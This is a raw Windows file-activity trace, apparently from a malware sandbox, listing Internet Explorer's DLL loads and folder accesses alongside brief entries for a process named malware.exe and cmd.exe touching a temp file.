11/3/2020 - 11:45:43.918Unknown1928C:\Program Files\Internet Explorer\iexplore.exeC:\Windows\System32\crypt32.dll
11/3/2020 - 11:45:43.918Unknown1928C:\Program Files\Internet Explorer\iexplore.exeC:\Windows\System32\msasn1.dll
11/3/2020 - 11:45:43.918Unknown1928C:\Program Files\Internet Explorer\iexplore.exeC:\Windows\System32\ieui.dll
11/3/2020 - 11:45:43.918Unknown1928C:\Program Files\Internet Explorer\iexplore.exeC:\Windows\System32\ExplorerFrame.dllExplorerFrame.dll
11/3/2020 - 11:45:43.918Unknown1928C:\Program Files\Internet Explorer\iexplore.exeC:\Program Files (x86)\Internet Explorer\iexplore.exe
11/3/2020 - 11:45:43.918Unknown1928C:\Program Files\Internet Explorer\iexplore.exeC:\Windows\System32\propsys.dll
11/3/2020 - 11:45:43.918Unknown1928C:\Program Files\Internet Explorer\iexplore.exeC:\Windows\System32\mssprxy.dll
11/3/2020 - 11:45:43.918Unknown1928C:\Program Files\Internet Explorer\iexplore.exeC:\Windows\System32\setupapi.dll
11/3/2020 - 11:45:43.918Unknown1928C:\Program Files\Internet Explorer\iexplore.exeC:\Windows\System32\cfgmgr32.dll
11/3/2020 - 11:45:43.918Unknown1928C:\Program Files\Internet Explorer\iexplore.exeC:\Windows\System32\devobj.dll
11/3/2020 - 11:45:43.918Unknown1928C:\Program Files\Internet Explorer\iexplore.exe\Device\HarddiskVolume2
11/3/2020 - 11:45:43.918Open1928C:\Program Files\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Temp\FFED.tmp
11/3/2020 - 11:45:43.918Open1928C:\Program Files\Internet Explorer\iexplore.exeC:\Windows\System32\sechost.dll
11/3/2020 - 11:45:43.918Open1928C:\Program Files\Internet Explorer\iexplore.exeC:\Windows\System32\sechost.dll
11/3/2020 - 11:45:43.918Open1928C:\Program Files\Internet Explorer\iexplore.exeC:\Program Files\Internet Explorer\api-ms-win-downlevel-shell32-l1-1-0.dll
11/3/2020 - 11:45:43.918Open1928C:\Program Files\Internet Explorer\iexplore.exeC:\Windows\System32\api-ms-win-downlevel-shell32-l1-1-0.dll
11/3/2020 - 11:45:43.918Unknown1928C:\Program Files\Internet Explorer\iexplore.exeC:\Windows\System32\api-ms-win-downlevel-shell32-l1-1-0.dllapi-ms-win-downlevel-shell32-l1-1-0.dll
11/3/2020 - 11:45:43.918Open1928C:\Program Files\Internet Explorer\iexplore.exeC:\Windows\System32\api-ms-win-downlevel-shell32-l1-1-0.dll
11/3/2020 - 11:45:43.918Unknown1928C:\Program Files\Internet Explorer\iexplore.exeC:\Windows\System32\api-ms-win-downlevel-shell32-l1-1-0.dllapi-ms-win-downlevel-shell32-l1-1-0.dll
11/3/2020 - 11:45:43.918Open1928C:\Program Files\Internet Explorer\iexplore.exeC:\Program Files\Internet Explorer\version.DLL
11/3/2020 - 11:45:43.918Open1928C:\Program Files\Internet Explorer\iexplore.exeC:\Windows\System32\version.dll
11/3/2020 - 11:45:43.918Open1928C:\Program Files\Internet Explorer\iexplore.exeC:\Windows\System32\version.dll
11/3/2020 - 11:45:43.934Open1928C:\Program Files\Internet Explorer\iexplore.exeC:\Windows\System32\imm32.dll
11/3/2020 - 11:45:43.934Open1928C:\Program Files\Internet Explorer\iexplore.exeC:\Windows\System32\imm32.dll
11/3/2020 - 11:45:43.934Open1928C:\Program Files\Internet Explorer\iexplore.exeC:\Windows\System32\imm32.dll
11/3/2020 - 11:45:43.934Open1928C:\Program Files\Internet Explorer\iexplore.exeC:\Windows\System32\imm32.dll
11/3/2020 - 11:45:43.934Open1928C:\Program Files\Internet Explorer\iexplore.exeC:\Windows\System32\imm32.dll
11/3/2020 - 11:45:43.934Open1928C:\Program Files\Internet Explorer\iexplore.exeC:\Windows\System32\imm32.dll
11/3/2020 - 11:45:43.934Unknown1480C:\malware.exeC:\Windows
11/3/2020 - 11:45:43.934Unknown1480C:\malware.exeC:\Windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.18837_none_41e855142bd5705d
11/3/2020 - 11:45:43.934Unknown1480C:\malware.exeC:\Windows\SysWOW64\pt-BR\KernelBase.dll.muiKernelBase.dll.mui
11/3/2020 - 11:45:43.934Unknown1480C:\malware.exeC:\Monitor\Malware
11/3/2020 - 11:45:43.934Open1928C:\Program Files\Internet Explorer\iexplore.exeC:\Program Files\Internet Explorer\CRYPTBASE.DLL
11/3/2020 - 11:45:43.934Open1928C:\Program Files\Internet Explorer\iexplore.exeC:\Windows\System32\cryptbase.dll
11/3/2020 - 11:45:43.934Unknown1928C:\Program Files\Internet Explorer\iexplore.exeC:\Windows\System32\cryptbase.dllcryptbase.dll
11/3/2020 - 11:45:43.934Open1928C:\Program Files\Internet Explorer\iexplore.exeC:\Windows\System32\cryptbase.dll
11/3/2020 - 11:45:43.934Unknown1928C:\Program Files\Internet Explorer\iexplore.exeC:\Windows\System32\cryptbase.dllcryptbase.dll
11/3/2020 - 11:45:43.934Open1928C:\Program Files\Internet Explorer\iexplore.exeC:\Windows\Globalization\Sorting\SortDefault.nls
11/3/2020 - 11:45:43.934Unknown1928C:\Program Files\Internet Explorer\iexplore.exeC:\Windows\Globalization\Sorting\SortDefault.nlsSortDefault.nls
11/3/2020 - 11:45:43.934Open1928C:\Program Files\Internet Explorer\iexplore.exeC:\Program Files\Internet Explorer\IEFRAME.dll
11/3/2020 - 11:45:43.934Open1928C:\Program Files\Internet Explorer\iexplore.exeC:\Windows\System32\ieframe.dll
11/3/2020 - 11:45:43.934Open1928C:\Program Files\Internet Explorer\iexplore.exeC:\Windows\System32\ieframe.dll
11/3/2020 - 11:45:43.934Open1928C:\Program Files\Internet Explorer\iexplore.exeC:\Windows\System32\ieframe.dll
11/3/2020 - 11:45:43.934Open1928C:\Program Files\Internet Explorer\iexplore.exeC:\Program Files\Internet Explorer\iexplore.exe.Local
11/3/2020 - 11:45:43.934Open1928C:\Program Files\Internet Explorer\iexplore.exeC:\Windows\winsxs\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.18837_none_fa3b1e3d17594757
11/3/2020 - 11:45:43.934Unknown1928C:\Program Files\Internet Explorer\iexplore.exeC:\Windows\winsxs\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.18837_none_fa3b1e3d17594757
11/3/2020 - 11:45:43.934Open1928C:\Program Files\Internet Explorer\iexplore.exeC:\Windows\winsxs\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.18837_none_fa3b1e3d17594757
11/3/2020 - 11:45:43.934Open1928C:\Program Files\Internet Explorer\iexplore.exeC:\Windows\winsxs\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.18837_none_fa3b1e3d17594757\comctl32.dll
11/3/2020 - 11:45:43.934Unknown1928C:\Program Files\Internet Explorer\iexplore.exeC:\Windows\winsxs\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.18837_none_fa3b1e3d17594757\comctl32.dll
11/3/2020 - 11:45:43.934Open1928C:\Program Files\Internet Explorer\iexplore.exeC:\Windows\winsxs\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.18837_none_fa3b1e3d17594757\comctl32.dll
11/3/2020 - 11:45:43.934Unknown1928C:\Program Files\Internet Explorer\iexplore.exeC:\Windows\winsxs\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.18837_none_fa3b1e3d17594757\comctl32.dll
11/3/2020 - 11:45:43.934Open1928C:\Program Files\Internet Explorer\iexplore.exeC:\Windows\WindowsShell.Manifest
11/3/2020 - 11:45:43.934Unknown1928C:\Program Files\Internet Explorer\iexplore.exeC:\Windows\WindowsShell.ManifestWindowsShell.Manifest
11/3/2020 - 11:45:43.950Open1928C:\Program Files\Internet Explorer\iexplore.exeC:\Program Files\Internet Explorer\IEShims.dll
11/3/2020 - 11:45:43.950Open1928C:\Program Files\Internet Explorer\iexplore.exeC:\Program Files\Internet Explorer\IEShims.dll
11/3/2020 - 11:45:43.950Open1928C:\Program Files\Internet Explorer\iexplore.exeC:\Program Files\Internet Explorer\iexplore.exe.Local
11/3/2020 - 11:45:43.950Open1928C:\Program Files\Internet Explorer\iexplore.exeC:\Windows\winsxs\amd64_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.18837_none_a4d981ff711297b6
11/3/2020 - 11:45:43.950Unknown1928C:\Program Files\Internet Explorer\iexplore.exeC:\Windows\winsxs\amd64_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.18837_none_a4d981ff711297b6
11/3/2020 - 11:45:43.950Open1928C:\Program Files\Internet Explorer\iexplore.exeC:\Windows\winsxs\amd64_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.18837_none_a4d981ff711297b6
11/3/2020 - 11:45:43.950Open1928C:\Program Files\Internet Explorer\iexplore.exeC:\Windows\winsxs\amd64_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.18837_none_a4d981ff711297b6\comctl32.dll
11/3/2020 - 11:45:43.950Unknown1928C:\Program Files\Internet Explorer\iexplore.exeC:\Windows\winsxs\amd64_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.18837_none_a4d981ff711297b6\comctl32.dll
11/3/2020 - 11:45:43.950Open1928C:\Program Files\Internet Explorer\iexplore.exeC:\Windows\winsxs\amd64_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.18837_none_a4d981ff711297b6\comctl32.dll
11/3/2020 - 11:45:43.950Unknown1928C:\Program Files\Internet Explorer\iexplore.exeC:\Windows\winsxs\amd64_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.18837_none_a4d981ff711297b6\comctl32.dll
11/3/2020 - 11:45:43.950Open1928C:\Program Files\Internet Explorer\iexplore.exeC:\Windows\winsxs\amd64_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.18837_none_a4d981ff711297b6\comctl32.dll
11/3/2020 - 11:45:43.950Unknown1928C:\Program Files\Internet Explorer\iexplore.exeC:\Windows\winsxs\amd64_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.18837_none_a4d981ff711297b6\comctl32.dll
11/3/2020 - 11:45:43.950Open1928C:\Program Files\Internet Explorer\iexplore.exeC:\Windows\winsxs\amd64_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.18837_none_a4d981ff711297b6\comctl32.dll
11/3/2020 - 11:45:43.950Unknown1928C:\Program Files\Internet Explorer\iexplore.exeC:\Windows\winsxs\amd64_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.18837_none_a4d981ff711297b6\comctl32.dll
11/3/2020 - 11:45:43.950Open1928C:\Program Files\Internet Explorer\iexplore.exeC:\Windows\winsxs\amd64_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.18837_none_a4d981ff711297b6\comctl32.dll
11/3/2020 - 11:45:43.950Unknown1928C:\Program Files\Internet Explorer\iexplore.exeC:\Windows\winsxs\amd64_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.18837_none_a4d981ff711297b6\comctl32.dll
11/3/2020 - 11:45:43.950Open1928C:\Program Files\Internet Explorer\iexplore.exeC:\Windows\winsxs\amd64_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.18837_none_a4d981ff711297b6\comctl32.dll
11/3/2020 - 11:45:43.950Unknown1928C:\Program Files\Internet Explorer\iexplore.exeC:\Windows\winsxs\amd64_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.18837_none_a4d981ff711297b6\comctl32.dll
11/3/2020 - 11:45:43.950Open1928C:\Program Files\Internet Explorer\iexplore.exeC:\Windows\winsxs\amd64_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.18837_none_a4d981ff711297b6\comctl32.dll
11/3/2020 - 11:45:43.950Unknown1928C:\Program Files\Internet Explorer\iexplore.exeC:\Windows\winsxs\amd64_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.18837_none_a4d981ff711297b6\comctl32.dll
11/3/2020 - 11:45:43.950Open1928C:\Program Files\Internet Explorer\iexplore.exeC:\Windows\winsxs\amd64_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.18837_none_a4d981ff711297b6\comctl32.dll
11/3/2020 - 11:45:43.950Unknown1928C:\Program Files\Internet Explorer\iexplore.exeC:\Windows\winsxs\amd64_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.18837_none_a4d981ff711297b6\comctl32.dll
11/3/2020 - 11:45:43.950Open1928C:\Program Files\Internet Explorer\iexplore.exeC:\Windows\System32\rpcss.dll
11/3/2020 - 11:45:43.950Open1928C:\Program Files\Internet Explorer\iexplore.exeC:\Windows\System32\rpcss.dll
11/3/2020 - 11:45:43.950Open1928C:\Program Files\Internet Explorer\iexplore.exeC:\Windows\System32\rpcss.dll
11/3/2020 - 11:45:43.950Open1928C:\Program Files\Internet Explorer\iexplore.exeC:\Windows\System32\rpcss.dll
11/3/2020 - 11:45:43.950Open1928C:\Program Files\Internet Explorer\iexplore.exeC:\Windows\System32\uxtheme.dll
11/3/2020 - 11:45:43.950Open1928C:\Program Files\Internet Explorer\iexplore.exeC:\Windows\System32\uxtheme.dll
11/3/2020 - 11:45:44.12Unknown1488C:\Windows\SysWOW64\cmd.exeC:\Windows
11/3/2020 - 11:45:44.12Unknown1488C:\Windows\SysWOW64\cmd.exeC:\Users\Behemot\AppData\Local\Temp\FFED.tmp
11/3/2020 - 11:45:44.12Unknown1488C:\Windows\SysWOW64\cmd.exeC:\Windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.18837_none_41e855142bd5705d
11/3/2020 - 11:45:44.43Open1928C:\Program Files\Internet Explorer\iexplore.exeC:\Program Files\Internet Explorer\dwmapi.dll
11/3/2020 - 11:45:44.43Open1928C:\Program Files\Internet Explorer\iexplore.exeC:\Windows\System32\dwmapi.dll
11/3/2020 - 11:45:44.43Open1928C:\Program Files\Internet Explorer\iexplore.exeC:\Windows\System32\dwmapi.dll
11/3/2020 - 11:45:44.43Open1928C:\Program Files\Internet Explorer\iexplore.exeC:\Program Files
11/3/2020 - 11:45:44.43Unknown1928C:\Program Files\Internet Explorer\iexplore.exeC:\Program Files
11/3/2020 - 11:45:44.43Open1928C:\Program Files\Internet Explorer\iexplore.exeC:\Program Files\Internet Explorer\sqmapi.dll
11/3/2020 - 11:45:44.43Open1928C:\Program Files\Internet Explorer\iexplore.exeC:\Program Files\Internet Explorer\sqmapi.dll
11/3/2020 - 11:45:44.43Open1928C:\Program Files\Internet Explorer\iexplore.exeC:\Program Files\Internet Explorer\Secur32.dll
11/3/2020 - 11:45:44.43Open1928C:\Program Files\Internet Explorer\iexplore.exeC:\Windows\System32\secur32.dll
11/3/2020 - 11:45:44.43Open1928C:\Program Files\Internet Explorer\iexplore.exeC:\Windows\System32\secur32.dll
11/3/2020 - 11:45:44.43Open1928C:\Program Files\Internet Explorer\iexplore.exeC:\Program Files\Internet Explorer\SSPICLI.DLL
11/3/2020 - 11:45:44.43Open1928C:\Program Files\Internet Explorer\iexplore.exeC:\Windows\System32\sspicli.dll
11/3/2020 - 11:45:44.43Open1928C:\Program Files\Internet Explorer\iexplore.exeC:\Windows\System32\sspicli.dll
11/3/2020 - 11:45:44.43Open1928C:\Program Files\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Microsoft\Windows\Temporary Internet Files
11/3/2020 - 11:45:44.43Unknown1928C:\Program Files\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Microsoft\Windows\Temporary Internet Files
11/3/2020 - 11:45:44.43Open1928C:\Program Files\Internet Explorer\iexplore.exeC:\Program Files\Internet Explorer\api-ms-win-downlevel-advapi32-l2-1-0.dll
11/3/2020 - 11:45:44.43Open1928C:\Program Files\Internet Explorer\iexplore.exeC:\Windows\System32\api-ms-win-downlevel-advapi32-l2-1-0.dll
11/3/2020 - 11:45:44.43Unknown1928C:\Program Files\Internet Explorer\iexplore.exeC:\Windows\System32\api-ms-win-downlevel-advapi32-l2-1-0.dllapi-ms-win-downlevel-advapi32-l2-1-0.dll
11/3/2020 - 11:45:44.43Open1928C:\Program Files\Internet Explorer\iexplore.exeC:\Windows\System32\api-ms-win-downlevel-advapi32-l2-1-0.dll
11/3/2020 - 11:45:44.43Unknown1928C:\Program Files\Internet Explorer\iexplore.exeC:\Windows\System32\api-ms-win-downlevel-advapi32-l2-1-0.dllapi-ms-win-downlevel-advapi32-l2-1-0.dll
11/3/2020 - 11:45:44.90Open1928C:\Program Files\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Microsoft\Windows\Temporary Internet Files\counters.dat
11/3/2020 - 11:45:44.90Open1928C:\Program Files\Internet Explorer\iexplore.exeC:\Windows\System32\winhttp.dll
11/3/2020 - 11:45:44.90Open1928C:\Program Files\Internet Explorer\iexplore.exeC:\Windows\System32\winhttp.dll
11/3/2020 - 11:45:44.90Open1928C:\Program Files\Internet Explorer\iexplore.exeC:\Windows\System32\webio.dll
11/3/2020 - 11:45:44.90Open1928C:\Program Files\Internet Explorer\iexplore.exeC:\Windows\System32\webio.dll
11/3/2020 - 11:45:44.90Open1928C:\Program Files\Internet Explorer\iexplore.exeC:\Program Files\Internet Explorer\api-ms-win-downlevel-shlwapi-l2-1-0.dll
11/3/2020 - 11:45:44.90Open1928C:\Program Files\Internet Explorer\iexplore.exeC:\Windows\System32\api-ms-win-downlevel-shlwapi-l2-1-0.dll
11/3/2020 - 11:45:44.90Unknown1928C:\Program Files\Internet Explorer\iexplore.exeC:\Windows\System32\api-ms-win-downlevel-shlwapi-l2-1-0.dllapi-ms-win-downlevel-shlwapi-l2-1-0.dll
11/3/2020 - 11:45:44.90Open1928C:\Program Files\Internet Explorer\iexplore.exeC:\Windows\System32\api-ms-win-downlevel-shlwapi-l2-1-0.dll
11/3/2020 - 11:45:44.90Unknown1928C:\Program Files\Internet Explorer\iexplore.exeC:\Windows\System32\api-ms-win-downlevel-shlwapi-l2-1-0.dllapi-ms-win-downlevel-shlwapi-l2-1-0.dll
11/3/2020 - 11:45:44.137Open1928C:\Program Files\Internet Explorer\iexplore.exeC:\Windows\System32\mswsock.dll
11/3/2020 - 11:45:44.137Open1928C:\Program Files\Internet Explorer\iexplore.exeC:\Windows\System32\mswsock.dll
11/3/2020 - 11:45:44.137Open1928C:\Program Files\Internet Explorer\iexplore.exeC:\Windows\System32\wship6.dll
11/3/2020 - 11:45:44.137Open1928C:\Program Files\Internet Explorer\iexplore.exeC:\Windows\System32\wship6.dll
11/3/2020 - 11:45:44.137Open1928C:\Program Files\Internet Explorer\iexplore.exeC:\Program Files\Internet Explorer\IPHLPAPI.DLL
11/3/2020 - 11:45:44.137Open1928C:\Program Files\Internet Explorer\iexplore.exeC:\Windows\System32\IPHLPAPI.DLL
11/3/2020 - 11:45:44.137Open1928C:\Program Files\Internet Explorer\iexplore.exeC:\Windows\System32\IPHLPAPI.DLL
11/3/2020 - 11:45:44.137Open1928C:\Program Files\Internet Explorer\iexplore.exeC:\Program Files\Internet Explorer\WINNSI.DLL
11/3/2020 - 11:45:44.137Open1928C:\Program Files\Internet Explorer\iexplore.exeC:\Windows\System32\winnsi.dll
11/3/2020 - 11:45:44.137Open1928C:\Program Files\Internet Explorer\iexplore.exeC:\Windows\System32\winnsi.dll
11/3/2020 - 11:45:44.325Open1928C:\Program Files\Internet Explorer\iexplore.exeC:\Program Files\Internet Explorer\CRYPTSP.dll
11/3/2020 - 11:45:44.325Open1928C:\Program Files\Internet Explorer\iexplore.exeC:\Windows\System32\cryptsp.dll
11/3/2020 - 11:45:44.325Open1928C:\Program Files\Internet Explorer\iexplore.exeC:\Windows\System32\cryptsp.dll
11/3/2020 - 11:45:44.325Open1928C:\Program Files\Internet Explorer\iexplore.exeC:\Windows\System32\rsaenh.dll
11/3/2020 - 11:45:44.325Open1928C:\Program Files\Internet Explorer\iexplore.exeC:\Windows\System32\rsaenh.dll
11/3/2020 - 11:45:44.325Open1928C:\Program Files\Internet Explorer\iexplore.exeC:\Windows\System32\rsaenh.dll
11/3/2020 - 11:45:44.325Open1928C:\Program Files\Internet Explorer\iexplore.exeC:\Windows\System32\rsaenh.dll
11/3/2020 - 11:45:44.325Open1928C:\Program Files\Internet Explorer\iexplore.exeC:\Windows\System32\rsaenh.dll
11/3/2020 - 11:45:44.325Open1928C:\Program Files\Internet Explorer\iexplore.exeC:\Windows\System32\rsaenh.dll
11/3/2020 - 11:45:44.325Open1928C:\Program Files\Internet Explorer\iexplore.exeC:\Windows\System32\rsaenh.dll
11/3/2020 - 11:45:44.325Open1928C:\Program Files\Internet Explorer\iexplore.exeC:\Windows\System32\rsaenh.dll
11/3/2020 - 11:45:44.325Open1928C:\Program Files\Internet Explorer\iexplore.exeC:\Windows\System32\rsaenh.dll
11/3/2020 - 11:45:44.325Open1928C:\Program Files\Internet Explorer\iexplore.exeC:\Windows\System32\rsaenh.dll
11/3/2020 - 11:45:44.325Open1928C:\Program Files\Internet Explorer\iexplore.exeC:\Windows\System32\rsaenh.dll
11/3/2020 - 11:45:44.325Open1928C:\Program Files\Internet Explorer\iexplore.exeC:\Windows\System32\rsaenh.dll
11/3/2020 - 11:45:44.325Open1928C:\Program Files\Internet Explorer\iexplore.exeC:\Program Files\Internet Explorer\RpcRtRemote.dll
11/3/2020 - 11:45:44.325Open1928C:\Program Files\Internet Explorer\iexplore.exeC:\Windows\System32\RpcRtRemote.dll
11/3/2020 - 11:45:44.325Unknown1928C:\Program Files\Internet Explorer\iexplore.exeC:\Windows\System32\RpcRtRemote.dllRpcRtRemote.dll
11/3/2020 - 11:45:44.325Open1928C:\Program Files\Internet Explorer\iexplore.exeC:\Windows\System32\RpcRtRemote.dll
11/3/2020 - 11:45:44.325Unknown1928C:\Program Files\Internet Explorer\iexplore.exeC:\Windows\System32\RpcRtRemote.dllRpcRtRemote.dll
11/3/2020 - 11:45:45.387Open1928C:\Program Files\Internet Explorer\iexplore.exeC:\Windows\System32\netprofm.dll
11/3/2020 - 11:45:45.387Open1928C:\Program Files\Internet Explorer\iexplore.exeC:\Windows\System32\netprofm.dll
11/3/2020 - 11:45:45.387Open1928C:\Program Files\Internet Explorer\iexplore.exeC:\Windows\System32\nlaapi.dll
11/3/2020 - 11:45:45.387Open1928C:\Program Files\Internet Explorer\iexplore.exeC:\Windows\System32\nlaapi.dll
11/3/2020 - 11:45:45.434Open1928C:\Program Files\Internet Explorer\iexplore.exeC:\Windows\System32\npmproxy.dll
11/3/2020 - 11:45:45.434Open1928C:\Program Files\Internet Explorer\iexplore.exeC:\Windows\System32\npmproxy.dll
11/3/2020 - 11:45:45.434Open1928C:\Program Files\Internet Explorer\iexplore.exeC:\Windows\System32\WSHTCPIP.DLL
11/3/2020 - 11:45:45.434Open1928C:\Program Files\Internet Explorer\iexplore.exeC:\Windows\System32\WSHTCPIP.DLL
11/3/2020 - 11:45:45.434Open1928C:\Program Files\Internet Explorer\iexplore.exeC:\Program Files\Internet Explorer\DNSAPI.dll
11/3/2020 - 11:45:45.434Open1928C:\Program Files\Internet Explorer\iexplore.exeC:\Windows\System32\dnsapi.dll
11/3/2020 - 11:45:45.434Open1928C:\Program Files\Internet Explorer\iexplore.exeC:\Windows\System32\dnsapi.dll
11/3/2020 - 11:45:45.434Open1928C:\Program Files\Internet Explorer\iexplore.exeC:\Program Files\Internet Explorer\suspend.dll
11/3/2020 - 11:45:45.434Open1928C:\Program Files\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Microsoft\Internet Explorer\UrlBlockManager\urlblocklist.bin
11/3/2020 - 11:45:45.434Unknown1928C:\Program Files\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Microsoft\Internet Explorer\UrlBlockManager\urlblocklist.binurlblocklist.bin
11/3/2020 - 11:45:45.434Open1928C:\Program Files\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Microsoft\Internet Explorer\UrlBlockManager\urlblocklist.bin
11/3/2020 - 11:45:45.434Unknown1928C:\Program Files\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Microsoft\Internet Explorer\UrlBlockManager\urlblocklist.binurlblocklist.bin
11/3/2020 - 11:45:45.434Open1928C:\Program Files\Internet Explorer\iexplore.exeC:\Users\Behemot\Desktop
11/3/2020 - 11:45:45.434Unknown1928C:\Program Files\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Temp\FFED.tmp
11/3/2020 - 11:45:45.434Open1928C:\Program Files\Internet Explorer\iexplore.exeC:\Users\Behemot
11/3/2020 - 11:45:45.434Open1928C:\Program Files\Internet Explorer\iexplore.exeC:\Users\Behemot
11/3/2020 - 11:45:45.434Unknown1928C:\Program Files\Internet Explorer\iexplore.exeC:\Users\Behemot
11/3/2020 - 11:45:45.434Open1928C:\Program Files\Internet Explorer\iexplore.exeC:\Users\Behemot\Favorites
11/3/2020 - 11:45:45.434Open1928C:\Program Files\Internet Explorer\iexplore.exeC:\Users\Behemot\Favorites
11/3/2020 - 11:45:45.434Unknown1928C:\Program Files\Internet Explorer\iexplore.exeC:\Users\Behemot\Favorites
11/3/2020 - 11:45:45.434Open1928C:\Program Files\Internet Explorer\iexplore.exeC:\Users\Behemot
11/3/2020 - 11:45:45.434Open1928C:\Program Files\Internet Explorer\iexplore.exeC:\Users\Behemot
11/3/2020 - 11:45:45.434Unknown1928C:\Program Files\Internet Explorer\iexplore.exeC:\Users\Behemot
11/3/2020 - 11:45:45.434Open1928C:\Program Files\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local
11/3/2020 - 11:45:45.434Open1928C:\Program Files\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local
11/3/2020 - 11:45:45.434Unknown1928C:\Program Files\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local
11/3/2020 - 11:45:45.434Open1928C:\Program Files\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Microsoft\Windows\Temporary Internet Files
11/3/2020 - 11:45:45.434Open1928C:\Program Files\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Microsoft\Windows\Temporary Internet Files
11/3/2020 - 11:45:45.434Unknown1928C:\Program Files\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Microsoft\Windows\Temporary Internet Files
11/3/2020 - 11:45:45.434Open1928C:\Program Files\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low
11/3/2020 - 11:45:45.434Unknown1928C:\Program Files\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low
11/3/2020 - 11:45:45.434Open1928C:\Program Files\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low
11/3/2020 - 11:45:45.434Unknown1928C:\Program Files\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low
11/3/2020 - 11:45:45.434Unknown1928C:\Program Files\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low
11/3/2020 - 11:45:45.434Open1928C:\Program Files\Internet Explorer\iexplore.exeC:\Users\Behemot
11/3/2020 - 11:45:45.434Open1928C:\Program Files\Internet Explorer\iexplore.exeC:\Users\Behemot
11/3/2020 - 11:45:45.434Unknown1928C:\Program Files\Internet Explorer\iexplore.exeC:\Users\Behemot
11/3/2020 - 11:45:45.434Open1928C:\Program Files\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Roaming
11/3/2020 - 11:45:45.434Open1928C:\Program Files\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Roaming
11/3/2020 - 11:45:45.434Unknown1928C:\Program Files\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Roaming
11/3/2020 - 11:45:45.434Open1928C:\Program Files\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Roaming\Microsoft\Windows\Cookies
11/3/2020 - 11:45:45.434Open1928C:\Program Files\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Roaming\Microsoft\Windows\Cookies
11/3/2020 - 11:45:45.434Unknown1928C:\Program Files\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Roaming\Microsoft\Windows\Cookies
11/3/2020 - 11:45:45.434Open1928C:\Program Files\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Roaming\Microsoft\Windows\Cookies\Low
11/3/2020 - 11:45:45.434Unknown1928C:\Program Files\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Roaming\Microsoft\Windows\Cookies\Low
11/3/2020 - 11:45:45.434Open1928C:\Program Files\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Roaming\Microsoft\Windows\Cookies\Low
11/3/2020 - 11:45:45.434Unknown1928C:\Program Files\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Roaming\Microsoft\Windows\Cookies\Low
11/3/2020 - 11:45:45.434Unknown1928C:\Program Files\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Roaming\Microsoft\Windows\Cookies\Low
11/3/2020 - 11:45:45.434Open1928C:\Program Files\Internet Explorer\iexplore.exeC:\Users\Behemot
11/3/2020 - 11:45:45.434Open1928C:\Program Files\Internet Explorer\iexplore.exeC:\Users\Behemot
11/3/2020 - 11:45:45.434Unknown1928C:\Program Files\Internet Explorer\iexplore.exeC:\Users\Behemot
11/3/2020 - 11:45:45.434Open1928C:\Program Files\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local
11/3/2020 - 11:45:45.434Open1928C:\Program Files\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local
